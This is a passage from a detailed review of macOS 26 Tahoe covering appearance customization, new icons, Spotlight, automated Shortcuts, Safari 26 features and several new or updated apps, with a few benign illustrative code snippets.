Most of these Control Center-derived menu bar items lack the finesse of the purpose-built menu bar items. Clicking the Wi-Fi or Sound settings or Dropbox's menu bar icon opens a little sub-menu without making you leave the app you're already in or dive into Settings, but many of the Control Center menu bar items are just buttons that open apps or turn settings on and off. The icons don't really change their state to reflect their status, like the Wi-Fi or Sound icons can.
Two stray observations about this newfound menu bar customization: First, this is one place where newer MacBooks' silly display notch is an active functional downgrade from a regular screen rather than a minor eyesore, because you can't fit as many menu bar icons. Second, Apple doesn't really limit you on the number of icons that can show up here—depending on the size of your screen, it's not too difficult to start eating into the space used for actual menus if you add too many.
If this happens, the menus will shove the menu bar icons over to the right a bit when you're actually digging into menus, so that you can see everything you need to see. Both visually and functionally, I prefer the menu bar with just a couple of extra frequently used icons in it. But it's one of a few places in Tahoe where Apple will actually let you make things kind of ugly before it will restrict your ability to change things. And on that note...
Infinite color options
Broadly speaking, Tahoe has six different visual styles, though many elements can be customized individually. Light mode with light icons adheres the most closely to the traditional look of macOS. (Credit: Andrew Cunningham)
Since introducing Dark Mode in macOS 10.14 Mojave in 2018, macOS has included a handful of toggles for customizing the overall look of your Mac. Tahoe supercharges that ability, adding not just the relatively well-publicized dark and translucent icon options and colorful Finder folders but splitting up some existing options so that they can be customized independently. The result is a version of macOS that's more visually flexible than anything we've seen since the old Mac OS Appearance Manager was still a thing.
These are the appearance settings that Tahoe will let you customize independently:
Whether windows and apps are in Light or Dark mode.
Whether icons and widgets are in Light mode, Dark mode, transparent mode, or tinted mode.
The color of your folders, which also controls the tint of icons and widgets in tinted mode.
Your text highlight color.
Your "theme" color. This dictates the color used for things like menu selections and buttons in various apps. By default, your text highlight color and default folder color track this selection, but you can change them if you want.
Using tags, it's possible to give individual folders a different color from the rest of the folders on your system.
This isn't new to Tahoe, but if you want to add even more color, go into the Display settings in Accessibility and mess with your pointer outline and fill color.
The original introduction of Dark Mode also made it possible to make macOS more colorful, moving away from the Aqua and Graphite themes that defined Mac OS X for most of its run. But Tahoe opens things up to some truly discordant-looking color combinations.
New icons
Icons in macOS Tahoe aren't allowed to overhang the borders of the rounded square anymore. Sometimes the differences aren't too noticeable, though overall they have a little less personality now.
All of Apple's first-party system icons have gotten a Liquid Glass-themed overhaul for Tahoe. Apple wants all icons, including its own, to be more consistent across its platforms. This means the last handful of icons that used the classic Mac "object sitting on top of some kind of image" style design have been removed from this version, replaced with the iOS-style rounded square. Those icons are also updated with Liquid Glass theming.
This icon shape has served the iPhone and iPad reasonably well for their entire existence, and Apple had already embraced the rounded square for most of its icons back in the Big Sur update. But the mandatory use of the shape, enforced at the operating-system level, is new, and it is too bad that first- and third-party apps that added small accents or overhanging elements to their own rounded squares are being discouraged from that behavior now.
For Apple's own icons, the new Liquid Glass icon updates are so subtle that it's hard to notice the difference, especially if the icon you're looking at is just a tiny patch of screen sitting in the Finder or on your Dock. Icons for Safari, the App Store, Messages, Reminders, and Music (among others) look almost the same as they did before.
Many icons get subtle Liquid Glass updates that look a lot like their previous versions.
Icons with overhanging bits (the tabs in Contacts, the bookmark in Dictionary) or with external objects superimposed on them (the little magnifying glass for Preview, the disk with a stethoscope for Disk Utility, the caliper thing for System Information) have been changed more extensively. Sometimes the thing that was overhanging the edges of the icon just gets tucked within its borders somehow, and sometimes Apple has settled on much more abstract iconography instead. I am not sure, for example, what the wrench in the new Disk Utility icon is meant to be turning, but "not really knowing how to physically represent what solid-state storage looks like" turns out to be a recurring theme. At least the iPhone Mirroring icon now looks like something that was designed intentionally rather than a placeholder.
Even icons for system apps have been changed to conform to the new look.
Apple has updated many of its system icons, including the old hard-drive-shaped icon for your Mac's internal disk. As with Disk Utility, the new icon looks basically nothing like any internal SSD that has ever existed; it could kind of look like an external SSD, but external disks get their own special icons.
Those system icon changes extend to folders in the Finder, which can change colors to match the highlight color you select in the Settings. Apps like Dropbox that use their own custom icons for some folders will need to be updated to support this feature, though—you may still run into icons with the old blue styling here and there.
Changing folder colors in Tahoe. Folders can also change colors individually using tags.
But in most other cases, Apple seems happy to take older icons and automatically modify them to match Tahoe's theming rather than letting old, non-updated icons stick out as all the other icons on your system change their colors and tints.
Apps that don't conform to the rounded square shape are put into icon jail.
If you have an app icon that isn't a rounded square, macOS takes it and stuffs it inside a rounded gray square (I've seen this referred to colloquially as "icon jail" or "squircle jail," and it feels apt). If your app was already using a rounded square without any overhang, Tahoe will add a glassy border around the edge of it. And if your icon uses flat colors on top of a flat background, Tahoe will even add a bit of a glassy look to the interior elements, too (Slack's icon is one good example of this).
How and why is this happening? It turns out that Tahoe treats icons differently than every other version of macOS going all the way back to the dawn of Mac OS X.
But when is an icon not an icon?
Undergirding macOS's more flexible theming and color-shifting icons is an entirely different approach to icons.
In past macOS versions, the icon you saw in the Finder or on the Dock was the .icns file contained in the app package (usually in the Resources folder in any given app bundle). The OS didn't usually do anything to this icon; it was just displayed as it was, even though in the Big Sur era Apple strongly encouraged the usage of either rounded squares or lightly modified versions of rounded squares, in an "it would be nice if you all would start doing this" kind of way.
Tahoe is obviously getting more aggressive with icon-shape enforcement, up to and including automatically manipulating icons and sentencing them to icon jail. Part of the point of this is to nudge developers toward using a single icon for every one of Apple's platforms that the app runs on—including iOS/iPadOS, macOS, and even watchOS. And to do that without requiring developers to manually create infinite color and tint combinations, we've got a new Apple Icon format (.icon) and the Icon Composer app.
Playing with the Ars logo in Apple's Icon Composer app for developers.
Icon Composer is a layer-based image-editing app devoted entirely to the task of building icons for Apple's operating systems. It can import layers in .svg or transparent .png formats and offers basic controls for adjusting the opacity and shadows and arrangement of different layers (like macOS, the app applies the glassy effect to elements on its own). Developers can test icons in light, dark, or clear modes against any background color or gradient or background image that they want. If you do want your Mac and iOS app icons to be a little different, there's a toggle in the app that lets you treat them separately, though both versions will still need to conform to the new rounded-square convention.
Icon Composer is meant as a last stop for an icon you've already designed in another app. Apple has created icon templates compatible with Adobe Photoshop and Illustrator, Figma, and Sketch. Those files contain 1024×1024 pixel rounded square shapes plus all of the gridlines that Apple encourages developers to use when designing and spacing different icon elements; Apple provides instructions for exporting layers from those apps individually as .svg or .png files.
You can love or hate Liquid Glass, and you can mourn or celebrate or be indifferent to this final death of Mac app icons with anything resembling their own unique shapes. But the idea behind Icon Composer and the new icon system is laudable, at least. Rather than manually generating icons in all kinds of different sizes for different platforms, you just create your icon once, double-check that it looks good in various modes against various backgrounds, and you send it to Xcode.
For backward compatibility, Xcode will generate a legacy .icns file based on your new .icon file; shipping different icons to fit the different looks of Tahoe and older macOS versions is apparently not possible by design.
One downside to all of this icon trickery is that I can now semi-regularly open a Finder window and see a hint of a delay in between when the window pops up and when the icons all pop in. This effect is especially pronounced right after you change your icons' color scheme or tint—I'd guess that the icon images are cached somewhere once they're generated, and only generated again if you change them. I would assume that the effect will be worse on a slower disk, like an external hard drive or a networked file share.
Spotlight
Spotlight in macOS 26 Tahoe.
This is completely anecdotal and unscientific, but when I hear some Mac power-user types talk about extra apps they need on a Mac to feel at home and productive, the apps that come up the most often are ones that replace or augment the built-in Spotlight search.
Spotlight, in its previous form, was focused mostly on search, with a few extra capabilities (like basic arithmetic or unit conversions) thrown in for good measure. It could search for local files or apps, for some kinds of online information like movies and sports scores, for contacts, and a few other things—being able to search for and launch apps makes it a decent de facto app launcher for items that aren't on your Dock.
A broad overview of Spotlight's new capabilities.
Some of the Spotlight improvements in Tahoe refine the search features that were already there, and some are new additions targeted toward the kinds of power users who might otherwise turn to apps like Alfred, LaunchBar, or Raycast for similar functionality. I don't know that Spotlight will replace those apps for their existing users, but as with the Passwords app, it might make Spotlight good enough to keep some people from hankering for a third-party solution in the first place.
Spotlight still mainly takes the form of a big search bar in the middle of your screen, invoked by clicking the magnifying glass on the top-right of the menu bar or with the Command + space keyboard shortcut. Apple seems to know that many people using Spotlight are using it exclusively with the keyboard, so everything here is meant to be doable with a handful of keyboard shortcuts and button presses.
Apple has added several generalized improvements to Spotlight in this release. These include the ability to search certain websites directly (type a URL and then tab to search that domain exclusively); to filter searches by typing a forward slash and then the name of an app, a file type, a folder, or a cloud storage provider; to search through currently open Safari tabs; and to page through your Spotlight search history by pressing the up and down arrows, the same way you look through your history in a command-line window.
But Spotlight's biggest change is the addition of four sub-categories that spring up to the right of the search bar after you let it sit without input for a couple of seconds: an Applications view, a Files view, an Actions view (with the same icon as the Shortcuts app), and a Clipboard view.
The Applications view is as close as Apple gets to offering the old Launchpad's functionality, listing five of your most frequently used apps at the top, an alphabetized list of your other apps below, and a few subcategory labels that mostly correspond to Apple's App Store categories. If you're paired to an iPhone via iPhone Mirroring, your iPhone apps also show up here, which can make for a big, messy alphabetized list of apps you'd never want to use on your Mac; conveniently, it's possible to hide iPhone apps from this view and just see the apps on your Mac. Apps in your Utilities folder are hidden away in their own section at the bottom of the list.
Aside from deciding whether you want to view iPhone apps and whether to view apps in a grid or list format, this view feels like it wants to be more customizable—a Windows Start menu-esque ability to manually pin or unpin apps from the top of the list would be nice.
The default Apps view in Spotlight, a replacement for the old Launchpad screen. If you've got iPhone Mirroring on, your phone apps all appear in this list too.
Use the arrow keys to highlight an app and press tab, and you'll be able to search within that app directly from Spotlight, useful for apps with searchable repositories of information, like Mail and Notes.
To an even greater extent than the Applications view, the Files view seems like it's meant to give Spotlight a tighter focus, rather than add all-new functionality. Finding files has been a core feature of Spotlight since it was originally added two decades (!) ago, but updates since then have buried file results a little underneath a pile of website suggestions, App Store suggestions, and IMDB results, none of which are useful when you're just trying to find that dang spreadsheet you saved somewhere.
The Files view is visually similar to the Applications view (including the ability to use a list view instead of a grid), but the purpose of each section has changed. The text labels across the top of the window are commonly used apps that are associated with documents, images, and other file types, allowing you to restrict your search only to files openable by those apps.
The next section down includes "suggestions," generated at least in part by how recently you've opened a file. And after the suggestions is a scrollable "recents" view showing files on your Mac or your iCloud Drive or external media, sorted by how recently the files were created or modified. Third-party cloud storage providers that have shifted to using Apple's File Provider API, as most of them have, can display results here and in the general Spotlight search view.
Shortcuts and clipboard history
Shortcuts actions and custom Quick Keys shortcuts in Spotlight.
The new Actions tab is where you start to get into the stuff that makes Spotlight more powerful, in addition to more focused. By default, what you'll see here is a long list of possible actions—recent ones that are more specific to you, like sending an email or text to a specific contact, as well as a long list of all the generalized shortcuts that first-party apps and compatible third-party apps can do.
All of these tasks map to actions that apps provide to the Shortcuts app using its App Intents framework—if the app you're using has created automations that can be used by Shortcuts, then those automations can be accessed here.
What makes these actions more Spotlight-y is the ability to take any specific action that you want to use and assign a Quick Keys shortcut to invoke it. For example, you could use "tmr" as a Quick Keys trigger for the "Start a Timer" action, and then type in "tmr 2" and hit enter to quickly set a two-minute timer right from Spotlight. That's a simple example, but the flexibility of Shortcuts should give you some idea of how versatile it could be once you spend some time setting it up.
Quick Keys triggers have a bunch of requirements:
Quick Keys can't use any special characters, like % or / or # or anything else like them.
You can't use any spaces.
You can't use capital letters (removing any possibility that Quick Keys might be case-sensitive).
Quick Keys triggers can be between one and 12 characters long.
Within those limitations, you can use any combination of letters and numbers that you like. That includes actual words, though personally I've tried to stay away from using words to avoid muddying up my general Spotlight search results. Setting multiple actions to the same Quick Keys combo is possible—it just brings up the entire list of actions with that Quick Key, rather than just triggering one specific action.
In my testing, it doesn't seem as though Quick Keys settings sync between Macs via iCloud, as text replacements and some other settings do. The downside is that you'll need to set up Quick Keys on every Mac you want to use it on if you're splitting time between a work laptop and one at home, or a laptop and a desktop. But it does at least maximize flexibility for two Macs that are used for totally different things.
In addition to using the provided App Intents-derived actions, Quick Keys combinations can be assigned to any custom shortcut you've created in the Shortcuts app, making it possible to invoke fairly complex actions through Spotlight with just a few keypresses—converting all files in a given folder to another type, or clearing all items from your desktop that are older than a certain date. I assigned "nas" as a Quick Keys trigger for the shortcut I use to automate connecting to my home file server. (This sort of thing dovetails nicely with other improvements to Shortcuts in Tahoe, which we'll get to shortly.)
Clipboard history in Spotlight. It retains its history for eight hours and only supports basic re-copying, rather than editing or anything more advanced.
The new clipboard history feature in Spotlight is probably the most broadly useful new feature, the closest you get to "low-hanging fruit" in an operating system that Apple has been continuously building on top of for 25 years.
It is turned off by default—anything that can store this kind of history is something that a snooper or domestic abuser could access. I noticed that passwords copied from Bitwarden, a third-party password manager, would show up in the clipboard history, though passwords copied from the first-party Passwords app wouldn't. It's best for privacy and security's sake, then, to make users explicitly choose to use it. But once you turn it on, it'll store your last eight hours of copy-and-pastes, whether they're text, images, or files. A user-configurable setting or a toggle for this deletion clock would be nice, but alas, it does not exist in this version.
The full list of recent copy-pastes is always accessible via the clipboard history section of Spotlight, but because they're part of Spotlight, they're searchable from within the main Spotlight bar and will show up alongside other results.
I do find myself wishing there were one keyboard shortcut, or a Dock or menu bar icon, that opened the clipboard history directly. It's possible to devise a hack for this kind of thing via scripting or Shortcuts, but it's the Apps view that gets a dedicated button and an optional configurable keyboard shortcut; the clipboard view gets neither. I've sort of gotten used to the motion of hitting Command + space to open Spotlight, and then hitting 4 while keeping my finger on the Command button. It just feels like the clipboard history is buried half an inch further down than I'd like it to be.
Spotlight's settings have evolved a little to match the feature's added complexity. The first toggle at the top controls whether your Spotlight searches include results from "Apple partners"—this is how it funnels in external info about movies and sports. One new button totally wipes out all your Quick Keys settings, if you want to start fresh, and another clears your Spotlight search history.
Newly redesigned settings for Spotlight.
The menu of apps and system folders to exclude from searches is basically the same as it was before, but Apple is using sliders for those toggles instead of checkboxes now, and each app's icon appears next to it to make it easier to tell at a glance which is which. The last toggle, all the way at the bottom, turns the clipboard history all the way off, stopping it from storing history and removing the section from the Spotlight interface entirely.
I find basically everything about the Spotlight upgrade to be neutral to positive, for anyone other than hardcore Launchpad fans—Apple hasn't broken the way it used to work for people who don't touch it much, while adding some extra power-user flexibility that can be customized and extended near-infinitely by Shortcuts workflows. Keeping the clipboard history off until the user opts in is a nice touch.
Automated Shortcuts
Here, I've set my Mac to connect to my home NAS whenever it's plugged in, and to read out its current battery level.
Of all the macOS features that have been added in the last five years or so, the one I use the most is probably the window snapping that Apple added to macOS 15 Sequoia, and the one I use second-most is Shortcuts, the modern and somewhat more user-friendly replacement for the old Automator app (Automator is still here, its interface just barely modernized enough to continue blending in). I don't have a ton of shortcuts set up, but the ones I do have I use several times a day.
Tahoe doesn't add much in the way of new Shortcuts features, but in addition to giving you another way to access shortcuts via Quick Keys in Spotlight, it adds Automations: a list of "if, then" statements that will run certain shortcuts automatically when certain things happen (these are, again, not to be confused with Automator, a separate app that still exists).
Configuring a new automated Shortcut.
Here are all of the things that can automatically run a Shortcut when they happen:
When it's a certain time of day, or sunrise, or sunset. These shortcuts can be set to repeat daily, weekly, or monthly.
When an alarm goes off, is snoozed, or is stopped.
When an email arrives. Users can specify a sender, a subject, or a recipient and can assign alerts to any one of the email accounts you've configured on the system.
When a text arrives in Messages, based on either sender or message content.
When items are added, modified, or removed in a given folder (this could be good for selective backups, when Time Machine is too heavy-duty.)
When a given file is modified.
When an external drive is connected or disconnected. This can be applied to one specific external drive, or any external drive.
When you connect to or disconnect from a specific Wi-Fi network, or when you're briefly disconnected from that network.
When you connect to or disconnect from a Bluetooth device.
When you connect to or disconnect from an external display. This one can't be tied to a specific external display—it fires when any external display is plugged in, which could make it a good candidate for the "run after confirmation" setting.
When the Stage Manager multitasking UI is turned on or off.
When a specific app is opened or closed.
When your battery level equals, rises above, or falls below a set percentage.
When you plug your Mac into a charger.
When you turn on or off the Do Not Disturb, Sleep, or Reduce Interruptions modes in the Do Not Disturb settings.
Automated Shortcuts can either be run automatically and invisibly or can prompt you for confirmation before running, making it usable for things you want to happen usually or sometimes but not always. Many automations offer an option to notify the user every time they run, even if they're set to run without confirmation.
You can tell automated Shortcuts to confirm with you first, which happens via notification.
The shortcuts I use the most frequently are for converting images and slide decks into sizes and formats suitable for our CMS. Often, the images that companies send out with press releases have super-high resolutions so that they're usable anywhere on the web (as well as in print, though that use case is ever-dwindling). I often convert them to be 1920 or 2560 pixels wide, or convert them from PNG or .webp to a good-old .jpg.
Currently, I use Quick Actions to do those conversions by right-clicking the files I want to convert and then selecting which Shortcut I want to use. But with Automations, I could just as easily have every image I send to a given folder automatically convert itself into a format and size suitable for the site. I could have my laptop connect to my home NAS every time it's plugged in, or have large video files offload themselves to an external disk every time I connect one.
Shortcuts is already an app that only really gives you back as much effort as you put into it, and automated Shortcuts will be the same way. I find setting up a new one to be an occasionally frustrating exercise in trial and error. But they offer yet another way to automate repetitive tasks you find yourself doing all the time, and I'm eager to see how I can work more of them into my own setup.
Apps: Safari 26
Tahoe includes a new major version of Safari, and like macOS, iOS, and Apple's other operating systems, it's switching to a year-based version numbering system. That means we're jumping from Safari 18 to Safari 26.
Per usual, Safari 26 will also be released to macOS 14 Sonoma and macOS 15 Sequoia, the other versions of macOS that Apple is still maintaining. On those platforms, it retains a user interface similar to Safari 18's, without the rounded Liquid Glass-ified touches you get in Tahoe.
There's plenty going on in Safari 26, as outlined in
the WebKit blog
and
Apple's WWDC session videos
. But once you filter out the incremental improvements to CSS and JavaScript that will mostly be of interest to web developers, changes that primarily affect platforms other than macOS (tweaks to how iOS and iPadOS handle webpages saved as apps, plus a bunch of stuff specific to visionOS), and password and passkey-related improvements that we'll cover in the section about the Passwords app, you don't end up with a huge list of features that Mac users will notice day to day.
Having dug through the changes, here's the list of Mac-related things that merited a half-interested "huh!" or better. When possible/applicable, we've done some surface-level checking to make sure all of this is supported in Sonoma and Sequoia, since Apple sometimes ships new Safari features that only work when the browser is installed on its newest OS.
WebGPU support
Safari 26 adds support for the WebGPU graphics API for the first time. Like the older WebGL standard—which WebGPU is meant to replace—WebGPU mainly allows for the rendering of 3D graphics within a browser window. WebGPU is a low-level graphics API that works with your platform's native low-level graphics language—DirectX 12 on Windows, Metal on macOS, and Vulkan on Linux—to give browsers more direct access to the GPU hardware. This can improve performance, but it also allows WebGPU to use your graphics hardware for things other than 3D rendering, including machine learning or AI-related tasks that GPUs are better at than CPUs.
"Whereas WebGL is mostly for drawing images but can be repurposed (with great effort) to do other kinds of computations, WebGPU has first-class support for performing general computations on the GPU," explains
the W3C's draft report
outlining the WebGPU spec.
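If you want to check for yourself whether a browser you're using exposes WebGPU, the detection logic is a one-liner on top of the standard API. Here's a minimal TypeScript sketch (these are standard WebGPU calls, nothing Safari-specific; the typings come from the @webgpu/types package):

```ts
// Minimal WebGPU availability check using the standard web API.
// Where WebGPU isn't exposed (e.g., Safari 26 running on macOS 14
// or 15, per the testing described below), navigator.gpu is absent.
async function initWebGPU(): Promise<GPUDevice | null> {
  if (!("gpu" in navigator)) {
    console.log("WebGPU is not available in this browser/OS combination");
    return null;
  }
  const adapter = await navigator.gpu.requestAdapter();
  if (adapter === null) {
    return null; // WebGPU exists, but no usable GPU adapter was found
  }
  // The returned device is the handle used to create buffers, shaders,
  // and render or compute pipelines.
  return await adapter.requestDevice();
}
```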
Apple is late to the party on implementing WebGPU, but not egregiously so. Google first introduced support into Chrome (and Chromium, and products downstream of Chromium like Microsoft Edge) back in 2023 with version 113, but only on Windows, macOS, and Android; as of this writing, Linux support is still labeled "experimental" and is disabled by default. Firefox introduced it in version 141 just this past summer, but only on Windows at first, with macOS and other platforms arriving "in the coming months." So if you don't like Chrome or Chromium for some reason, Safari 26 will be your first chance to use WebGPU on a Mac in the stable version of a non-Chromium browser.
WebGPU support in Safari 26 requires macOS 26 Tahoe. In our testing, it didn't work in Safari 26 running on macOS 14 Sonoma or macOS 15 Sequoia.
As of Beta 5, WebGPU samples that we tested did not work in Safari 26 on macOS 14 Sonoma or macOS 15 Sequoia. To get support, you'll need to be running Safari 26 or newer on macOS 26 or newer. (WebGPU does work in Chrome and other Chromium browsers on these operating systems.)
HDR image support
Safari has supported HDR video for several years now, but Safari 26 adds support for embedded HDR images, for displays that can actually handle them.
Developers will be able to use no-limit and standard CSS values to determine what happens when a mix of HDR and SDR content is being displayed at the same time. The no-limit value will display HDR content in HDR; the standard value will convert the images to SDR, which Apple says "prevents HDR images and video from appearing overly bright or out of place next to SDR content."
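Apple's wording names the values but not the property they belong to; assuming they hang off the CSS dynamic-range-limit property that the WebKit blog describes, usage would look something like this sketch (the class names are hypothetical):

```ts
// Hedged sketch, assuming these values belong to the CSS
// dynamic-range-limit property: cap a gallery of mixed SDR/HDR images
// at SDR so nothing looks jarringly bright, while letting a standalone
// hero image use the display's full HDR range.
const gallery = document.querySelector<HTMLElement>(".mixed-gallery");
gallery?.style.setProperty("dynamic-range-limit", "standard");

const hero = document.querySelector<HTMLElement>(".hero-photo");
hero?.style.setProperty("dynamic-range-limit", "no-limit");
```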
HDR image support also requires Safari 26 to be running on top of macOS 26. It won't be supported in Safari 26 on either macOS 14 Sonoma or macOS 15 Sequoia.
SVG favicons
Apple and Safari have gone on quite a journey when it comes to favicons, those little icons that websites put in your browser tabs.
For many years, Safari simply didn't support favicons in tabs at all, using only hard-to-distinguish text labels to differentiate tabs from one another. Starting with 2018's Safari 12 release, Apple gave users the off-by-default option to use favicons in tabs, matching the way that every other browser in existence treated them. 2020's Safari 14 enabled favicons in tabs by default. Having finally reconciled itself to the icons' utility, Apple is now working on improving them.
Those icons can actually be used in a lot of places throughout macOS (and iOS), including on Safari's new tab page, on the dock or Home screen (for web apps), and in Safari's tabs. Safari 26 adds the ability to recognize favicons in the .svg vector graphics format, which allows the images to be scaled up or down infinitely without losing quality, so they look nice and sharp no matter where they're displayed.
As Apple points out, the file size of an .svg file can often be smaller than a .png that's large enough to look good everywhere it's displayed. This saves web developers from needing to create multiple sizes of .png or .ico files and can even be used to create an adaptive favicon that can be tweaked to look different in dark and light modes.
Apple is more tardy with .svg favicon support than it is with WebGPU support—maybe not surprising, given how resistant the company was to using the icons as intended. Support has existed in Firefox and the Chromium family for many years (since 2019 or 2020 for Chromium, and as far back as 2015 for Firefox). Better late than never!
“Pretty text”
This one is technically a web developer feature, and if the pages you're viewing don't use it, you won't see any benefit. But the way Safari uses the CSS text-wrap: pretty property is kind of cool, and Apple is taking it a bit further than other browsers that support the property (including, yes, Chrome).
"Pretty text" is meant to automatically fix a few different things that can make text on the Internet worse-looking and/or more difficult to read. Without adjusting the kerning or anything about the actual typography, the "pretty" property scoots words around to avoid hyphenation, avoid short last lines at the ends of paragraphs, clean up ragged right edges of paragraphs, and help fix "typographic rivers" or distracting lines of vertical blank space that can be created when too many of the spaces between words line up across too many lines of text.
Examples of the things that the "pretty" CSS property is trying to clean up. Credit: WebKit blog
Chrome's implementation is primarily focused on fixing short last lines (also called "orphans," though the CSS Working Group recently decided to stop using the terminology). Apple developer evangelist Jen Simmons writes on the WebKit blog that the Chromium implementation of the tag just examines the last few lines of any given paragraph, while the WebKit/Safari implementation evaluates entire paragraphs at once when deciding how to lay out text.
The only thing the CSS specification says about the "pretty" value is that browsers "should bias for better [text] layout over speed" when they encounter it; the spec leaves the exact implementation up to individual browsers, which gives Apple room to go its own way a bit while still being standards-compliant.
Simmons and other developers have noted that the tag can come with a performance penalty but that the expected behavior is that "your text element would need to be many hundreds or thousands of lines long to see a performance hit."
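Since this is an ordinary CSS property, opting in takes one declaration per text element, and browsers that don't support the value simply ignore it. A minimal sketch, with a hypothetical selector:

```ts
// Opt an article's paragraphs into "pretty" wrapping. Browsers that
// don't recognize the value ignore it, so no fallback is needed.
for (const p of document.querySelectorAll<HTMLElement>("article p")) {
  p.style.setProperty("text-wrap", "pretty");
}
```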
The text-wrap: pretty property appears to work the same way in macOS 14 Sonoma and macOS 15 Sequoia as it does in Tahoe, once Safari 26 is installed.
Additional anonymizing
Apple says that Safari 26 takes steps to hide other personally identifiable information from "known fingerprinting scripts" that gather information about the device you're using to browse. Properties that Apple is trying to mask include "screen dimensions, hardware concurrency [that is, the number of logical processors available on your system], the list of voices available through the SpeechSynthesis API, Apple Pay payment capabilities, web audio readback, 2D canvas, and more."
Apple just says that the browser prevents these scripts from "reliably accessing web APIs" that may reveal this kind of information, suggesting that some loopholes may still exist.
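For context, the signals Apple lists are all readable through ordinary web APIs; each one is innocuous on its own, but combined they can make a device recognizable. A short sketch of a few of the reads Apple names:

```ts
// A few of the standard web API reads that fingerprinting scripts
// combine into a device signature; Safari 26 aims to keep "known
// fingerprinting scripts" from reading these reliably.
const signals = {
  screenSize: [screen.width, screen.height],               // screen dimensions
  cores: navigator.hardwareConcurrency,                    // logical processors
  voices: speechSynthesis.getVoices().map((v) => v.name),  // SpeechSynthesis voices
};
console.log(JSON.stringify(signals));
```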
The Phone app
The dialer in the new Phone app.
While Apple has allowed macOS users to take incoming phone calls from their Macs for years now, placing a call from a Mac has been less straightforward. You could start a phone call by clicking a phone number in Contacts or some other app, and Messages gives you buttons to kick off a FaceTime call. You could use Siri to dial numbers. But macOS wouldn't offer you an actual phone dialer until you had already made a phone call (in Sequoia, it's accessible via a 3x3 grid of circles in the notification that pops up during a call).
The Phone app in macOS is a version of the updated app that the iPhone is getting this year, rearranged a bit to account for the increase in screen space. The default view shows your favorite contacts and recent calls, plus buttons for editing your favorites and viewing only missed calls or calls with voicemails. A pane on the right shows different information based on what you've clicked—usually a contact card, for a recent or missed call, but also playback controls and a transcript for voicemails.
Things you can do in the Phone app in iOS, like adding a number to a contact or reporting a call as spam, can be handled here. It's possible in the Settings to enable, disable, and configure call screening and call filtering from unknown callers, settings that will sync to your phone as you change them.
Tahoe's tweaked version of the phone notification.
Most importantly, hitting the 3x3 grid button next to the search bar brings up the standard iPhone dialer, one that can place calls directly to any number you like, rather than using Siri or your Contacts or Recents lists. Clicking each button individually with your pointer is an option, but the dialer also takes keyboard input (it still plays touch tones as you type numbers in) and will offer to paste things from the clipboard.
When you're on a call, devices with Apple Intelligence turned on can access the new Call Recording, Live Translation, and Hold Assist features from the ellipsis menu, which is also where you can bring up the contact card for whoever you're currently speaking to (you'll find more on those features elsewhere in the review).
The Journal app
The Mac picks up a version of the Journal app this year, though Apple doesn't explain why the app wasn't on the Mac in the first place. The iOS version of the Journal app prompts you to write based on recent locations you've visited, and your Mac might not go on as many day trips or long walks with you. But you'd think it would make sense for Apple's keyboard-driven platform to get the minimalist app that does nothing other than record your written thoughts.
Regardless, it's here now! The main addition to the app this year (on all the platforms that now include it) is an option to create multiple different journals for different kinds of entries. You could have one for home and one for work, or separate journals just for vacations or other Major Life Events that you might want to have cordoned off in their own special area.
The other major addition is a "Places" view. If you let the Journal app record your location whenever you're writing an entry, you can open a map view and see pins for all the locations you've been. Clicking a pin brings up all the entries associated with that location.
As on the iPhone, Journal on the Mac lets you add photos to entries, and journals can be locked with Touch ID to add an additional layer of authentication.
The Games app
The Games app in macOS 26 Tahoe.
One could quibble about Apple's strategy, or about how successful the company has been in making the Mac a gaming destination. But Apple is visibly putting in the effort, adding new features and new tools in an attempt to make playing and developing games on the Mac a better experience. In the last few releases, Apple has added and continuously improved support for external game controllers, added a low-latency Game Mode, and introduced the Game Porting Toolkit, a collection of translation layers that helps developers test native Windows games on the Mac without modification.
We'll talk some more about the developer side when we talk about Metal 4, the upgraded version of Apple's graphics API, and improvements to Apple's Game Porting Toolkit. But for users, this year's big addition is a new Games app that serves as an alternate app storefront, a hub for online interactions and multiplayer, a reminder that the Apple Arcade service exists, and a library that gathers and displays all games installed on your Mac, including those you've installed from alternative game storefronts like Steam.
The Games app rises from the ashes of Game Center, an attempt during iOS' early days to give game developers a consistent Apple-controlled platform to use for leaderboards, achievements, and online multiplayer. Game Center was a dedicated app for a long while; the app was eventually removed, but the underlying service was still there. Games is built directly on top of the remnants of the old Game Center, and any friends or achievements or multiplayer games you already had going through Game Center now appear in the Games app with no effort or action required.
New games can be bought directly through the Games app, or there's an "open in App Store" link next to the purchase buttons that will open the game's page in the App Store proper. Both apps are pulling ratings, descriptions, and other metadata from the same sources, and users can continue to buy games through the App Store without using the Games app at all. Purchased games show up both in the Library tab of the Games app and in your list of past purchases in the App Store.
If you've spent any time with the Discover tab of the Mac App Store, the general layout of the Home tab in the Games app should look pretty familiar. It starts with a list of things you've recently bought or played, plus a feed of friend activity, some top charts for both Apple Arcade and various game categories, and then some curated highlights from Apple's internal App Store team.
When you're not a subscriber, the Arcade tab is just one big billboard for the Apple Arcade service, which costs $7 a month (or $20 a month as part of an Apple One subscription) for unrestricted access to a smallish but consistently updated batch of games. Subscribers can just use this tab to explore and download what's available.
The Friends tab is a repository of recent friend activity, and allows you to invite your friends into multiplayer games, or to participate in asynchronous "challenges" like trying to hit the highest score in a certain game within a certain amount of time. For people with longer and more active Game Center friend lists than I have, I can definitely see the appeal of this—something that allows for light competitive play that can be done whenever you can find the time, whether you're on a train, winding down before bed, or... well, what you're doing when you decide to play phone games is your business and not mine.
The Library tab shows App Store games plus locally installed games from other sources.
The Library tab will be the most interesting for people who have a lot of games installed from Steam, GOG, or some other source. App Store-purchased games show up in your library whether they're installed or not, while games bought from elsewhere will only show up if they've been installed, but it's nice to be able to gather everything from the built-in Chess app to a Steam-installed copy of Cyberpunk 2077 all in one interface.
There are different view filters for installed games, games with controller support, and games from Apple Arcade, though unfortunately for the Mac app there's no filter that shows only games made specifically for the Mac—you'll see some clutter in here from every iOS and iPadOS game you own that can technically be installed on a Mac, even if it's not optimized for the Mac.
Messages
The new Messages app design, complete with background.
My favorite feature about this year's Messages upgrade is the ability to add backgrounds to conversations, even though (as with all the new OS-wide appearance settings) it's possible to use color gradients or photos that make your backgrounds look profoundly ugly. But the backgrounds are set for each individual contact or group text, so you have lots of leeway to experiment without simultaneously uglifying every one of your chats.
These do appear to sync between devices connected to the same iCloud account, but I noticed that they only really synced from my iPhone to my Macs rather than syncing from my Macs back to my iPhone. Like the names and icons used for group chats, they sync between everyone in a text thread, at least if all the devices involved are running iOS/iPadOS/macOS 26.
